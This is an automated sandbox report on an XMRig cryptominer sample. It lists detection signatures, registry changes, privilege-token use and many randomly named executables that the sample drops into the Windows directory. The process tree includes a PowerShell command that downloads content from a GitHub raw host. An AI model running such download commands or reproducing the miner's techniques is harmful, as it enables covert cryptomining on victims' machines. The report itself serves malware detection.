Malware Analysis Report

2025-04-19 18:42

Sample ID 240527-dcs2ysdg21
Target 77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118
SHA256 f0e7ed3d803ad9e95734463cfcd93eed6d23776915a7a322d2f9b48d1b188901
Tags
xmrig execution miner upx
score
10/10

Analysis Overview

score
10/10

SHA256

f0e7ed3d803ad9e95734463cfcd93eed6d23776915a7a322d2f9b48d1b188901

Threat Level: Known bad

The file 77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

xmrig

XMRig Miner payload

Xmrig family

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 02:52

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 02:52

Reported

2024-05-27 02:54

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Processes

C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\pflqtkN.exe

C:\Windows\System\BFNeIVY.exe

C:\Windows\System\BFNeIVY.exe

C:\Windows\System\eVPTUoA.exe

C:\Windows\System\eVPTUoA.exe

C:\Windows\System\ZFpPdCw.exe

C:\Windows\System\ZFpPdCw.exe

C:\Windows\System\KQiqczT.exe

C:\Windows\System\KQiqczT.exe

C:\Windows\System\kHpUAia.exe

C:\Windows\System\kHpUAia.exe

C:\Windows\System\IBGhTNc.exe

C:\Windows\System\IBGhTNc.exe

C:\Windows\System\dPkcAVl.exe

C:\Windows\System\dPkcAVl.exe

C:\Windows\System\QqHncIL.exe

C:\Windows\System\QqHncIL.exe

C:\Windows\System\PwcnUEZ.exe

C:\Windows\System\PwcnUEZ.exe

C:\Windows\System\ucFNvjp.exe

C:\Windows\System\ucFNvjp.exe

C:\Windows\System\lHdyCBb.exe

C:\Windows\System\lHdyCBb.exe

C:\Windows\System\iyIwaJd.exe

C:\Windows\System\iyIwaJd.exe

C:\Windows\System\vFQDVbM.exe

C:\Windows\System\vFQDVbM.exe

C:\Windows\System\vDJgVYH.exe

C:\Windows\System\vDJgVYH.exe

C:\Windows\System\EENWkEK.exe

C:\Windows\System\EENWkEK.exe

C:\Windows\System\dMkcDfZ.exe

C:\Windows\System\dMkcDfZ.exe

C:\Windows\System\oVSXbAl.exe

C:\Windows\System\oVSXbAl.exe

C:\Windows\System\hciOoli.exe

C:\Windows\System\hciOoli.exe

C:\Windows\System\fPlnMwe.exe

C:\Windows\System\fPlnMwe.exe

C:\Windows\System\LKvpHfe.exe

C:\Windows\System\LKvpHfe.exe

C:\Windows\System\aRfJKSC.exe

C:\Windows\System\aRfJKSC.exe

C:\Windows\System\cdkPjzy.exe

C:\Windows\System\cdkPjzy.exe

C:\Windows\System\lGfebtF.exe

C:\Windows\System\lGfebtF.exe

C:\Windows\System\bapOdWL.exe

C:\Windows\System\bapOdWL.exe

C:\Windows\System\LctzKbX.exe

C:\Windows\System\LctzKbX.exe

C:\Windows\System\lHdibvE.exe

C:\Windows\System\lHdibvE.exe

C:\Windows\System\wMAdYHD.exe

C:\Windows\System\wMAdYHD.exe

C:\Windows\System\pNcMRVr.exe

C:\Windows\System\pNcMRVr.exe

C:\Windows\System\ACbhuTa.exe

C:\Windows\System\ACbhuTa.exe

C:\Windows\System\IGVeMZY.exe

C:\Windows\System\IGVeMZY.exe

C:\Windows\System\lCedQtS.exe

C:\Windows\System\lCedQtS.exe

C:\Windows\System\nWZonGb.exe

C:\Windows\System\nWZonGb.exe

C:\Windows\System\wbPkqLm.exe

C:\Windows\System\wbPkqLm.exe

C:\Windows\System\faugfEb.exe

C:\Windows\System\faugfEb.exe

C:\Windows\System\cxDopor.exe

C:\Windows\System\cxDopor.exe

C:\Windows\System\hyzpOcb.exe

C:\Windows\System\hyzpOcb.exe

C:\Windows\System\dYMyzGi.exe

C:\Windows\System\dYMyzGi.exe

C:\Windows\System\tdjhoaB.exe

C:\Windows\System\tdjhoaB.exe

C:\Windows\System\TMnfpYt.exe

C:\Windows\System\TMnfpYt.exe

C:\Windows\System\UtclCQZ.exe

C:\Windows\System\UtclCQZ.exe

C:\Windows\System\YxmbWcF.exe

C:\Windows\System\YxmbWcF.exe

C:\Windows\System\fXmDILR.exe

C:\Windows\System\fXmDILR.exe

C:\Windows\System\qruqquD.exe

C:\Windows\System\qruqquD.exe

C:\Windows\System\SnrJUHQ.exe

C:\Windows\System\SnrJUHQ.exe

C:\Windows\System\xcgkhOB.exe

C:\Windows\System\xcgkhOB.exe

C:\Windows\System\gxzDTKo.exe

C:\Windows\System\gxzDTKo.exe

C:\Windows\System\OLrtEDR.exe

C:\Windows\System\OLrtEDR.exe

C:\Windows\System\foMZgtB.exe

C:\Windows\System\foMZgtB.exe

C:\Windows\System\unRsXON.exe

C:\Windows\System\unRsXON.exe

C:\Windows\System\MhEkflJ.exe

C:\Windows\System\MhEkflJ.exe

C:\Windows\System\TjMDIHm.exe

C:\Windows\System\TjMDIHm.exe

C:\Windows\System\SBGXEIF.exe

C:\Windows\System\SBGXEIF.exe

C:\Windows\System\VytnCTC.exe

C:\Windows\System\VytnCTC.exe

C:\Windows\System\AuunmIm.exe

C:\Windows\System\AuunmIm.exe

C:\Windows\System\XfjVrGb.exe

C:\Windows\System\XfjVrGb.exe

C:\Windows\System\JsHhPQD.exe

C:\Windows\System\JsHhPQD.exe

C:\Windows\System\aTwgFrG.exe

C:\Windows\System\aTwgFrG.exe

C:\Windows\System\GsnLcrn.exe

C:\Windows\System\GsnLcrn.exe

C:\Windows\System\RcxoSHr.exe

C:\Windows\System\RcxoSHr.exe

C:\Windows\System\AEuVJPD.exe

C:\Windows\System\AEuVJPD.exe

C:\Windows\System\SoOdUqN.exe

C:\Windows\System\SoOdUqN.exe

C:\Windows\System\MJDYJKm.exe

C:\Windows\System\MJDYJKm.exe

C:\Windows\System\UneOQLR.exe

C:\Windows\System\UneOQLR.exe

C:\Windows\System\LQWeCQR.exe

C:\Windows\System\LQWeCQR.exe

C:\Windows\System\synHfXj.exe

C:\Windows\System\synHfXj.exe

C:\Windows\System\OXNadeM.exe

C:\Windows\System\OXNadeM.exe

C:\Windows\System\aCAwqaG.exe

C:\Windows\System\aCAwqaG.exe

C:\Windows\System\ncUOIPa.exe

C:\Windows\System\ncUOIPa.exe

C:\Windows\System\drvjzcR.exe

C:\Windows\System\drvjzcR.exe

C:\Windows\System\SSyUvRj.exe

C:\Windows\System\SSyUvRj.exe

C:\Windows\System\riucacz.exe

C:\Windows\System\riucacz.exe

C:\Windows\System\ovjsPiE.exe

C:\Windows\System\ovjsPiE.exe

C:\Windows\System\pNZIdkt.exe

C:\Windows\System\pNZIdkt.exe

C:\Windows\System\HZEhBbP.exe

C:\Windows\System\HZEhBbP.exe

C:\Windows\System\cxjhNNJ.exe

C:\Windows\System\cxjhNNJ.exe

C:\Windows\System\EJTyroe.exe

C:\Windows\System\EJTyroe.exe

C:\Windows\System\xDTyIxd.exe

C:\Windows\System\xDTyIxd.exe

C:\Windows\System\YvrvCFq.exe

C:\Windows\System\YvrvCFq.exe

C:\Windows\System\WfeelXs.exe

C:\Windows\System\WfeelXs.exe

C:\Windows\System\qhfCZEK.exe

C:\Windows\System\qhfCZEK.exe

C:\Windows\System\OVVlPCD.exe

C:\Windows\System\OVVlPCD.exe

C:\Windows\System\qFvRkzI.exe

C:\Windows\System\qFvRkzI.exe

C:\Windows\System\lNDbIqt.exe

C:\Windows\System\lNDbIqt.exe

C:\Windows\System\zvDYZGd.exe

C:\Windows\System\zvDYZGd.exe

C:\Windows\System\kyBSRcH.exe

C:\Windows\System\kyBSRcH.exe

C:\Windows\System\hasnlsQ.exe

C:\Windows\System\hasnlsQ.exe

C:\Windows\System\ZmJBeSG.exe

C:\Windows\System\ZmJBeSG.exe

C:\Windows\System\MAslSCi.exe

C:\Windows\System\MAslSCi.exe

C:\Windows\System\qLLoHOi.exe

C:\Windows\System\qLLoHOi.exe

C:\Windows\System\teqqXaq.exe

C:\Windows\System\teqqXaq.exe

C:\Windows\System\hlSsOmf.exe

C:\Windows\System\hlSsOmf.exe

C:\Windows\System\cXNHdHR.exe

C:\Windows\System\cXNHdHR.exe

C:\Windows\System\KDMscAU.exe

C:\Windows\System\KDMscAU.exe

C:\Windows\System\KdLNVBe.exe

C:\Windows\System\KdLNVBe.exe

C:\Windows\System\yjcoXph.exe

C:\Windows\System\yjcoXph.exe

C:\Windows\System\OOHJeuq.exe

C:\Windows\System\OOHJeuq.exe

C:\Windows\System\zdhkmAe.exe

C:\Windows\System\zdhkmAe.exe

C:\Windows\System\JsYlAYc.exe

C:\Windows\System\JsYlAYc.exe

C:\Windows\System\wnShuaJ.exe

C:\Windows\System\wnShuaJ.exe

C:\Windows\System\jnOdYDw.exe

C:\Windows\System\jnOdYDw.exe

C:\Windows\System\HvbqUbb.exe

C:\Windows\System\HvbqUbb.exe

C:\Windows\System\DoyRNJh.exe

C:\Windows\System\DoyRNJh.exe

C:\Windows\System\TbcLPJb.exe

C:\Windows\System\TbcLPJb.exe

C:\Windows\System\sPFlRFA.exe

C:\Windows\System\sPFlRFA.exe

C:\Windows\System\oBiWpVJ.exe

C:\Windows\System\oBiWpVJ.exe

C:\Windows\System\tPagYTK.exe

C:\Windows\System\tPagYTK.exe

C:\Windows\System\SRPDjqw.exe

C:\Windows\System\SRPDjqw.exe

C:\Windows\System\ymIuMnh.exe

C:\Windows\System\ymIuMnh.exe

C:\Windows\System\umxWbgK.exe

C:\Windows\System\umxWbgK.exe

C:\Windows\System\eBbQbgy.exe

C:\Windows\System\eBbQbgy.exe

C:\Windows\System\QgZlvoS.exe

C:\Windows\System\QgZlvoS.exe

C:\Windows\System\qBhdmSs.exe

C:\Windows\System\qBhdmSs.exe

C:\Windows\System\UFhZQKl.exe

C:\Windows\System\UFhZQKl.exe

C:\Windows\System\nzYNKca.exe

C:\Windows\System\nzYNKca.exe

C:\Windows\System\wSWjpku.exe

C:\Windows\System\wSWjpku.exe

C:\Windows\System\nByXMqO.exe

C:\Windows\System\nByXMqO.exe

C:\Windows\System\YNslLJx.exe

C:\Windows\System\YNslLJx.exe

C:\Windows\System\BAnLQXp.exe

C:\Windows\System\BAnLQXp.exe

C:\Windows\System\ZKdXCNg.exe

C:\Windows\System\ZKdXCNg.exe

C:\Windows\System\JoCgCvP.exe

C:\Windows\System\JoCgCvP.exe

C:\Windows\System\zGMDZrU.exe

C:\Windows\System\zGMDZrU.exe

C:\Windows\System\jKdMNqs.exe

C:\Windows\System\jKdMNqs.exe

C:\Windows\System\godtzer.exe

C:\Windows\System\godtzer.exe

C:\Windows\System\FqOGVWN.exe

C:\Windows\System\FqOGVWN.exe

C:\Windows\System\uBmPOUT.exe

C:\Windows\System\uBmPOUT.exe

C:\Windows\System\cjrSZTH.exe

C:\Windows\System\cjrSZTH.exe

C:\Windows\System\Belixzh.exe

C:\Windows\System\Belixzh.exe

C:\Windows\System\cwKRzMv.exe

C:\Windows\System\cwKRzMv.exe

C:\Windows\System\mVBnHxF.exe

C:\Windows\System\mVBnHxF.exe

C:\Windows\System\rBqldvJ.exe

C:\Windows\System\rBqldvJ.exe

C:\Windows\System\uxvFsGR.exe

C:\Windows\System\uxvFsGR.exe

C:\Windows\System\xTwjspR.exe

C:\Windows\System\xTwjspR.exe

C:\Windows\System\DpkUZUE.exe

C:\Windows\System\DpkUZUE.exe

C:\Windows\System\ICRAhyU.exe

C:\Windows\System\ICRAhyU.exe

C:\Windows\System\hkGPgDF.exe

C:\Windows\System\hkGPgDF.exe

C:\Windows\System\nvUQiJL.exe

C:\Windows\System\nvUQiJL.exe

C:\Windows\System\CxPVTxY.exe

C:\Windows\System\CxPVTxY.exe

C:\Windows\System\KshERKl.exe

C:\Windows\System\KshERKl.exe

C:\Windows\System\SuqQodd.exe

C:\Windows\System\SuqQodd.exe

C:\Windows\System\YRvSzwH.exe

C:\Windows\System\YRvSzwH.exe

C:\Windows\System\HJjLeBF.exe

C:\Windows\System\HJjLeBF.exe

C:\Windows\System\DOVyAXz.exe

C:\Windows\System\DOVyAXz.exe

C:\Windows\System\seFDOzK.exe

C:\Windows\System\seFDOzK.exe

C:\Windows\System\aZeHVaF.exe

C:\Windows\System\aZeHVaF.exe

C:\Windows\System\XQEWhZA.exe

C:\Windows\System\XQEWhZA.exe

C:\Windows\System\XKCJzYF.exe

C:\Windows\System\XKCJzYF.exe

C:\Windows\System\JaRyiMm.exe

C:\Windows\System\JaRyiMm.exe

C:\Windows\System\ghoBCnM.exe

C:\Windows\System\ghoBCnM.exe

C:\Windows\System\Dbxsbpg.exe

C:\Windows\System\Dbxsbpg.exe

C:\Windows\System\GSNfftx.exe

C:\Windows\System\GSNfftx.exe

C:\Windows\System\ZySqQCf.exe

C:\Windows\System\ZySqQCf.exe

C:\Windows\System\cuMYtjL.exe

C:\Windows\System\cuMYtjL.exe

C:\Windows\System\NuVBFyf.exe

C:\Windows\System\NuVBFyf.exe

C:\Windows\System\rnIARzk.exe

C:\Windows\System\rnIARzk.exe

C:\Windows\System\JYhTOVu.exe

C:\Windows\System\JYhTOVu.exe

C:\Windows\System\nyMHcnz.exe

C:\Windows\System\nyMHcnz.exe

C:\Windows\System\VhbadTy.exe

C:\Windows\System\VhbadTy.exe

C:\Windows\System\fvxkIrB.exe

C:\Windows\System\fvxkIrB.exe

C:\Windows\System\YEZVlJf.exe

C:\Windows\System\YEZVlJf.exe

C:\Windows\System\AtGquzj.exe

C:\Windows\System\AtGquzj.exe

C:\Windows\System\NyPAGkA.exe

C:\Windows\System\NyPAGkA.exe

C:\Windows\System\VmDvjGs.exe

C:\Windows\System\VmDvjGs.exe

C:\Windows\System\Tkeelcu.exe

C:\Windows\System\Tkeelcu.exe

C:\Windows\System\RFDfJht.exe

C:\Windows\System\RFDfJht.exe

C:\Windows\System\RDBYLXh.exe

C:\Windows\System\RDBYLXh.exe

C:\Windows\System\JteYrIv.exe

C:\Windows\System\JteYrIv.exe

C:\Windows\System\wWrEwxd.exe

C:\Windows\System\wWrEwxd.exe

C:\Windows\System\KIllRiU.exe

C:\Windows\System\KIllRiU.exe

C:\Windows\System\GseZWie.exe

C:\Windows\System\GseZWie.exe

C:\Windows\System\ITMHOpy.exe

C:\Windows\System\ITMHOpy.exe

C:\Windows\System\CtjUdyz.exe

C:\Windows\System\CtjUdyz.exe

C:\Windows\System\YmMVAFO.exe

C:\Windows\System\YmMVAFO.exe

C:\Windows\System\bFZptuT.exe

C:\Windows\System\bFZptuT.exe

C:\Windows\System\jvYVcLr.exe

C:\Windows\System\jvYVcLr.exe

C:\Windows\System\PNhLBcm.exe

C:\Windows\System\PNhLBcm.exe

C:\Windows\System\MoWQsoO.exe

C:\Windows\System\MoWQsoO.exe

C:\Windows\System\liEeGvP.exe

C:\Windows\System\liEeGvP.exe

C:\Windows\System\rYqYdag.exe

C:\Windows\System\rYqYdag.exe

C:\Windows\System\YEcCfkZ.exe

C:\Windows\System\YEcCfkZ.exe

C:\Windows\System\JVRwnbw.exe

C:\Windows\System\JVRwnbw.exe

C:\Windows\System\zlVsqNF.exe

C:\Windows\System\zlVsqNF.exe

C:\Windows\System\RJDvfiP.exe

C:\Windows\System\RJDvfiP.exe

C:\Windows\System\NHlzkud.exe

C:\Windows\System\NHlzkud.exe

C:\Windows\System\dqCbFOh.exe

C:\Windows\System\dqCbFOh.exe

C:\Windows\System\kDoVNrg.exe

C:\Windows\System\kDoVNrg.exe

C:\Windows\System\RttKqXs.exe

C:\Windows\System\RttKqXs.exe

C:\Windows\System\VXiSytQ.exe

C:\Windows\System\VXiSytQ.exe

C:\Windows\System\TdpBTAj.exe

C:\Windows\System\TdpBTAj.exe

C:\Windows\System\EPRvuZc.exe

C:\Windows\System\EPRvuZc.exe

C:\Windows\System\zAzGKdi.exe

C:\Windows\System\zAzGKdi.exe

C:\Windows\System\HdzYhaG.exe

C:\Windows\System\HdzYhaG.exe

C:\Windows\System\PeTsmxL.exe

C:\Windows\System\PeTsmxL.exe

C:\Windows\System\UDHroYI.exe

C:\Windows\System\UDHroYI.exe

C:\Windows\System\NkcThCm.exe

C:\Windows\System\NkcThCm.exe

C:\Windows\System\lbStYPz.exe

C:\Windows\System\lbStYPz.exe

C:\Windows\System\EwmGaLA.exe

C:\Windows\System\EwmGaLA.exe

C:\Windows\System\ZzquinI.exe

C:\Windows\System\ZzquinI.exe

C:\Windows\System\llRGQXf.exe

C:\Windows\System\llRGQXf.exe

C:\Windows\System\RkYPMbj.exe

C:\Windows\System\RkYPMbj.exe

C:\Windows\System\OpMzLId.exe

C:\Windows\System\OpMzLId.exe

C:\Windows\System\ujFOyiw.exe

C:\Windows\System\ujFOyiw.exe

C:\Windows\System\xGRrpkM.exe

C:\Windows\System\xGRrpkM.exe

C:\Windows\System\LJsHRCD.exe

C:\Windows\System\LJsHRCD.exe

C:\Windows\System\ENOjHwk.exe

C:\Windows\System\ENOjHwk.exe

C:\Windows\System\nxedIbu.exe

C:\Windows\System\nxedIbu.exe

C:\Windows\System\mQjBwaa.exe

C:\Windows\System\mQjBwaa.exe

C:\Windows\System\MiqmWvl.exe

C:\Windows\System\MiqmWvl.exe

C:\Windows\System\agtUnwN.exe

C:\Windows\System\agtUnwN.exe

C:\Windows\System\USHWHYL.exe

C:\Windows\System\USHWHYL.exe

C:\Windows\System\hUHnlHX.exe

C:\Windows\System\hUHnlHX.exe

C:\Windows\System\tZkKwMd.exe

C:\Windows\System\tZkKwMd.exe

C:\Windows\System\SIMvvfs.exe

C:\Windows\System\SIMvvfs.exe

C:\Windows\System\DScMgFC.exe

C:\Windows\System\DScMgFC.exe

C:\Windows\System\WsZfLez.exe

C:\Windows\System\WsZfLez.exe

C:\Windows\System\vaVIJlw.exe

C:\Windows\System\vaVIJlw.exe

C:\Windows\System\fyAmhAi.exe

C:\Windows\System\fyAmhAi.exe

C:\Windows\System\HizJNGu.exe

C:\Windows\System\HizJNGu.exe

C:\Windows\System\ugFfPET.exe

C:\Windows\System\ugFfPET.exe

C:\Windows\System\waoSHFj.exe

C:\Windows\System\waoSHFj.exe

C:\Windows\System\spFViup.exe

C:\Windows\System\spFViup.exe

C:\Windows\System\FLIkJyv.exe

C:\Windows\System\FLIkJyv.exe

C:\Windows\System\sDkLgtT.exe

C:\Windows\System\sDkLgtT.exe

C:\Windows\System\fCYDHzt.exe

C:\Windows\System\fCYDHzt.exe

C:\Windows\System\hDlDoIz.exe

C:\Windows\System\hDlDoIz.exe

C:\Windows\System\qZhsQmB.exe

C:\Windows\System\qZhsQmB.exe

C:\Windows\System\CqBrevR.exe

C:\Windows\System\CqBrevR.exe

C:\Windows\System\uDBGBol.exe

C:\Windows\System\uDBGBol.exe

C:\Windows\System\dMqLlev.exe

C:\Windows\System\dMqLlev.exe

C:\Windows\System\MLEjiZm.exe

C:\Windows\System\MLEjiZm.exe

C:\Windows\System\lVtbyoP.exe

C:\Windows\System\lVtbyoP.exe

C:\Windows\System\zydLYLb.exe

C:\Windows\System\zydLYLb.exe

C:\Windows\System\UoucTIq.exe

C:\Windows\System\UoucTIq.exe

C:\Windows\System\kpaTrvq.exe

C:\Windows\System\kpaTrvq.exe

C:\Windows\System\gwEQAqH.exe

C:\Windows\System\gwEQAqH.exe

C:\Windows\System\gzcgEjw.exe

C:\Windows\System\gzcgEjw.exe

C:\Windows\System\TruxXWr.exe

C:\Windows\System\TruxXWr.exe

C:\Windows\System\pJneWqI.exe

C:\Windows\System\pJneWqI.exe

C:\Windows\System\foMOOmx.exe

C:\Windows\System\foMOOmx.exe

C:\Windows\System\nXLjXzG.exe

C:\Windows\System\nXLjXzG.exe

C:\Windows\System\lGvKQSG.exe

C:\Windows\System\lGvKQSG.exe

C:\Windows\System\QNTiRoD.exe

C:\Windows\System\QNTiRoD.exe

C:\Windows\System\UPKVOPK.exe

C:\Windows\System\UPKVOPK.exe

C:\Windows\System\ntTdqid.exe

C:\Windows\System\ntTdqid.exe

C:\Windows\System\IyiXNrx.exe

C:\Windows\System\IyiXNrx.exe

C:\Windows\System\UpIMFEU.exe

C:\Windows\System\UpIMFEU.exe

C:\Windows\System\YxoDgiv.exe

C:\Windows\System\YxoDgiv.exe

C:\Windows\System\BAeMhij.exe

C:\Windows\System\BAeMhij.exe

C:\Windows\System\cIqtCqd.exe

C:\Windows\System\cIqtCqd.exe

C:\Windows\System\LnELjQm.exe

C:\Windows\System\LnELjQm.exe

C:\Windows\System\ZcCmJKd.exe

C:\Windows\System\ZcCmJKd.exe

C:\Windows\System\NEaWBKc.exe

C:\Windows\System\NEaWBKc.exe

C:\Windows\System\CFVupRR.exe

C:\Windows\System\CFVupRR.exe

C:\Windows\System\SytRWNi.exe

C:\Windows\System\SytRWNi.exe

C:\Windows\System\BMrzBzO.exe

C:\Windows\System\BMrzBzO.exe

C:\Windows\System\SSjTsDS.exe

C:\Windows\System\SSjTsDS.exe

C:\Windows\System\iHofWTC.exe

C:\Windows\System\iHofWTC.exe

C:\Windows\System\MAOeyMe.exe

C:\Windows\System\MAOeyMe.exe

C:\Windows\System\YjxCflb.exe

C:\Windows\System\YjxCflb.exe

C:\Windows\System\fXilUJL.exe

C:\Windows\System\fXilUJL.exe

C:\Windows\System\sNXXsLg.exe

C:\Windows\System\sNXXsLg.exe

C:\Windows\System\tlPSvBM.exe

C:\Windows\System\tlPSvBM.exe

C:\Windows\System\hyItLlY.exe

C:\Windows\System\hyItLlY.exe

C:\Windows\System\OENMcrt.exe

C:\Windows\System\OENMcrt.exe

C:\Windows\System\nihDdAw.exe

C:\Windows\System\nihDdAw.exe

C:\Windows\System\hEwaiET.exe

C:\Windows\System\hEwaiET.exe

C:\Windows\System\GWuBwwG.exe

C:\Windows\System\GWuBwwG.exe

C:\Windows\System\vTTRenT.exe

C:\Windows\System\vTTRenT.exe

C:\Windows\System\KibKFqJ.exe

C:\Windows\System\KibKFqJ.exe

C:\Windows\System\MxzNkgT.exe

C:\Windows\System\MxzNkgT.exe

C:\Windows\System\IESbVuH.exe

C:\Windows\System\IESbVuH.exe

C:\Windows\System\sqlPYFj.exe

C:\Windows\System\sqlPYFj.exe

C:\Windows\System\JiQYtDQ.exe

C:\Windows\System\JiQYtDQ.exe

C:\Windows\System\PSfXnEg.exe

C:\Windows\System\PSfXnEg.exe

C:\Windows\System\xfHGixx.exe

C:\Windows\System\xfHGixx.exe

C:\Windows\System\QPiZMTr.exe

C:\Windows\System\QPiZMTr.exe

C:\Windows\System\ivebSGr.exe

C:\Windows\System\ivebSGr.exe

C:\Windows\System\NAcxETE.exe

C:\Windows\System\NAcxETE.exe

C:\Windows\System\sxinVQk.exe

C:\Windows\System\sxinVQk.exe

C:\Windows\System\SvqgOaB.exe

C:\Windows\System\SvqgOaB.exe

C:\Windows\System\mkPEKbX.exe

C:\Windows\System\mkPEKbX.exe

C:\Windows\System\UaRtJsL.exe

C:\Windows\System\UaRtJsL.exe

C:\Windows\System\iVQowze.exe

C:\Windows\System\iVQowze.exe

C:\Windows\System\OqWsdSZ.exe

C:\Windows\System\OqWsdSZ.exe

C:\Windows\System\WhoIMQT.exe

C:\Windows\System\WhoIMQT.exe

C:\Windows\System\GGvlIeN.exe

C:\Windows\System\GGvlIeN.exe

C:\Windows\System\LemhlvT.exe

C:\Windows\System\LemhlvT.exe

